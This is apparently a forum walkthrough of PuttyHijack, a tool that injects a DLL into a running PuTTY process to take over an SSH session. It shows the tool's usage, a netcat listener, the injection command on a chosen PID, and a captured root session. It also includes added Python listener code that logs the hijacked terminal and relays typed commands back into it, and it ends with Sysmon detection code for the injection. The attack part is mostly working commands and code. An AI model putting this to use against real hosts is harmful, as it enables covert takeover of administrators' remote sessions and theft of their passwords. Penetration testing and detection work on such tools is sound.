http://packetstormsecurity.org/filed...kV1.0.rar.html

PuttyHijack is a proof-of-concept tool that injects a DLL into the PuTTY process to hijack an existing, or soon-to-be-created, connection. This is useful during a penetration test when a compromised Windows box is used to SSH/Telnet into other servers. The injected DLL installs hooks and opens a callback socket that is then used for input/output redirection. It does not kill the current connection, and it cleanly uninjects if the socket or the process is stopped.
So let's see what it does, eh? First let's set up a test server. I often use BackTrack since it's really easy to use and I'm a bit familiar with it. I will start some services to emulate a web server, and let's say the admin wants to administer some stuff over his nice PuTTY SSH connection.

Code:
webmaster# cd /var/www/
webmaster# ls
cgi-bin/  error/  htdocs/  icons/
webmaster#
Load the nice PuTTY hijacking tool:

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+     Insomnia Security      +
+    www.insomniasec.com     +
++++++++++++++++++++++++++++++
- Usage: PuttyHijack IP PORT <pid>
Get the PID of putty.exe (from tasklist):

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>tasklist

Image Name                   PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         16 K
putty.exe                   1584 Console                 0      3,552 K
System                         4 Console                 0         36 K
smss.exe                     760 Console                 0        228 K
csrss.exe                    832 Console                 0      2,524 K
winlogon.exe                 860 Console                 0      1,352 K
services.exe                 904 Console                 0      2,044 K
Now we need something to receive the data the injected DLL sends back from the PuTTY terminal. Start a netcat or socat listener on the port the hijacker will be told to connect back to (port 22 here):

Code:
C:\Documents and Settings\lerie>nc -l -p 22 -v
listening on [any] 22 ...
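A listener that does a little more than nc, as an added example that is not code from the original post or from the PuttyHijack tool: it accepts the DLL's connect-back, logs every byte unmodified, shows it on screen with the ANSI colour codes stripped, and relays whatever the operator types back into the session (the DLL redirects input as well as output over this socket). The host, port and log path are arguments; the name `listener.py` and the sample capture in the comments are assumptions for the example.

```python
"""Connect-back listener for a hijacked PuTTY session.

Added example; not code from the original post or from PuttyHijack.  It
stands in for the 'nc -l -p 22 -v' listener: it accepts the injected DLL's
callback, writes every byte PuTTY sees to a log file unmodified, prints it
with ANSI colour codes stripped, and forwards operator input back into the
session.  Binding port 22 as in the post needs Administrator/root.
"""
import re
import socket
import sys
import threading
import time

# ESC [ ... final-byte (CSI, e.g. ESC[01;31m) or a bare two-byte ESC sequence.
# The Windows console renders the ESC byte (0x1B) as a left arrow, which is
# why captures look like '<-[01;31m'; on the wire it is 0x1B.
ANSI_RE = re.compile(rb"\x1b\[[0-?]*[ -/]*[@-~]|\x1b[@-Z\\-_]")


def strip_ansi(raw: bytes) -> bytes:
    """Remove ANSI escape sequences from a captured chunk."""
    return ANSI_RE.sub(b"", raw)


def transcript(raw: bytes) -> list:
    """Turn a raw capture into clean, non-empty text lines for review."""
    clean = strip_ansi(raw).replace(b"\r\n", b"\n").replace(b"\r", b"\n")
    return [ln.decode("utf-8", "replace").rstrip()
            for ln in clean.split(b"\n") if ln.strip()]


def _pump_operator_input(conn: socket.socket) -> None:
    """Relay operator keystrokes (line at a time) into the hijacked session."""
    for line in sys.stdin:
        conn.sendall(line.encode())


def serve(bind_addr: str, port: int, logfile: str) -> int:
    """Accept one connect-back; return the number of bytes captured."""
    captured = 0
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        print(f"listening on {bind_addr}:{port} ...", file=sys.stderr)
        conn, peer = srv.accept()
    with conn, open(logfile, "ab") as log:
        print(f"+ connect-back from {peer[0]}:{peer[1]}", file=sys.stderr)
        log.write(f"# session from {peer[0]} at {time.ctime()}\n".encode())
        threading.Thread(target=_pump_operator_input, args=(conn,),
                         daemon=True).start()
        while True:
            data = conn.recv(4096)
            if not data:          # DLL uninjected or PuTTY closed
                break
            captured += len(data)
            log.write(data)       # raw bytes, escapes included, as evidence
            sys.stdout.write(strip_ansi(data).decode("utf-8", "replace"))
            sys.stdout.flush()
    return captured


if __name__ == "__main__":
    # e.g. python listener.py 192.168.1.100 22 session.log
    serve(sys.argv[1], int(sys.argv[2]), sys.argv[3])
```

The raw log keeps the escape bytes so the evidence is exactly what PuTTY saw; `transcript()` is for reading it afterwards. Input is relayed a line at a time, which is enough for typing commands into the session but will not carry interactive keystrokes such as tab completion.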
Then run the hijacker, giving it the listener's IP and port and the PID of putty.exe:

Code:
C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0>PuttyHijack.exe 192.168.1.100 22 1680
++++++++++++++++++++++++++++++
+ Putty Terminal Hijack V1.0 +
+     Insomnia Security      +
+    www.insomniasec.com     +
++++++++++++++++++++++++++++++
- Connect back to 192.168.1.100:22
- Injecting to PID 1680
- Opening process
- Starting remote thread
And reap the rewards, in real time. Everything that crosses the hijacked terminal arrives on the listener; the arrows in the capture are the ESC byte (0x1B) of the ANSI colour codes, as the Windows console renders it:

Code:
+ Connected..
su root
←[01;31mbt ←[01;34m~ # ←[00mcd /v       ar/www/ht       docs/
←[01;31mbt ←[01;34mhtdocs # ←[00mls -l
←[00mtotal 23
-rw-r--r--  1 root root 2326 Nov 20  2004 ←[01;35mapache_pb.gif←[00m
-rw-r--r--  1 root root 1385 Nov 20  2004 ←[01;35mapache_pb.png←[00m
-rw-r--r--  1 root root 2410 Dec 14  2005 ←[01;35mapache_pb22.gif←[00m
-rw-r--r--  1 root root 1502 Dec 14  2005 ←[01;35mapache_pb22.png←[00m
-rw-r--r--  1 root root 2205 Dec 14  2005 ←[01;35mapache_pb22_ani.gif←[00m
-rw-r--r--  1 root root   36 Jun 25 07:10 ←[00mindex.html←[00m
-rw-r--r--  1 root root   44 Nov 20  2004 ←[00mindex.html~←[00m
-rw-r--r--  1 root root   35 Jun 25 07:11 ←[00mindex.php←[00m
drwxr-xr-x 14 root root  656 Jul  1  2007 ←[01;34mmanual←[00m/
←[m←[01;31mbt ←[01;34mhtdocs # ←[00mwe can even see passwords...
bash: we: command not found
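The defender's side of the same technique, as an added example that is not from the original post: the hijacker's own output names the host-side artefacts (it opens the putty.exe process and starts a remote thread in it to load the DLL), and Sysmon records such a thread as Event ID 8 (CreateRemoteThread) and the resulting DLL as Event ID 7 (ImageLoad). The records below are constructed for this example using Sysmon's field names; the paths, the DLL name `hijack.dll` and the trusted-directory list are assumptions, not details from the post.

```python
"""Spot PuttyHijack-style injection in Sysmon-like event records.

Added example; not code from the original post or from PuttyHijack.  The
records in SAMPLE_EVENTS are constructed with Sysmon's field names; every
value in them is made up for the example.
"""
import ntpath

PUTTY = "putty.exe"
# Where a clean putty.exe should load DLLs from (assumed; adjust per estate).
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\putty\\",
)
# Thread start functions that mean "load a DLL into the target".
LOADER_FUNCS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def check_remote_thread(ev: dict):
    """Event ID 8: a thread created in putty.exe by some other process."""
    if ev.get("EventID") != 8 or _base(ev["TargetImage"]) != PUTTY:
        return None
    if _base(ev["SourceImage"]) == PUTTY:
        return None  # PuTTY creating its own threads is normal
    why = f"remote thread in {ev['TargetImage']} from {ev['SourceImage']}"
    if ev.get("StartFunction") in LOADER_FUNCS:
        why += f", start function {ev['StartFunction']} (DLL injection)"
    return why


def check_image_load(ev: dict):
    """Event ID 7: putty.exe loading a DLL from an odd place, or unsigned."""
    if ev.get("EventID") != 7 or _base(ev["Image"]) != PUTTY:
        return None
    loaded = ev["ImageLoaded"]
    trusted_dir = loaded.lower().startswith(TRUSTED_DLL_DIRS)
    if trusted_dir and ev.get("Signed", "false") == "true":
        return None
    return f"putty.exe loaded {loaded} (outside trusted dirs or unsigned)"


def find_injections(events) -> list:
    """Run both checks over a stream of events; return readable alerts."""
    alerts = []
    for ev in events:
        for check in (check_remote_thread, check_image_load):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample: a process start, the injection, the injected DLL's
# load and a benign system DLL load.  All values are made up.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Program Files\PuTTY\putty.exe",
     "ProcessId": 1680},
    {"EventID": 8,
     "SourceImage": r"C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0\PuttyHijack.exe",
     "TargetImage": r"C:\Program Files\PuTTY\putty.exe",
     "StartModule": r"C:\WINDOWS\system32\kernel32.dll",
     "StartFunction": "LoadLibraryA"},
    {"EventID": 7, "Image": r"C:\Program Files\PuTTY\putty.exe",
     "ImageLoaded": r"C:\Documents and Settings\lerie\Desktop\PuttyHijackV1.0\hijack.dll",
     "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Program Files\PuTTY\putty.exe",
     "ImageLoaded": r"C:\WINDOWS\system32\ws2_32.dll", "Signed": "true"},
]

if __name__ == "__main__":
    for alert in find_injections(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Two caveats. The callback in the walkthrough goes to port 22, so a network rule of the form "putty.exe talks to TCP/22" cannot tell the hijack from the legitimate SSH session; the host-side thread and image-load events are what to rely on. And endpoint security products legitimately create remote threads in other processes, so in production the source-image check needs an allowlist rather than the bare "anything other than putty.exe" used here.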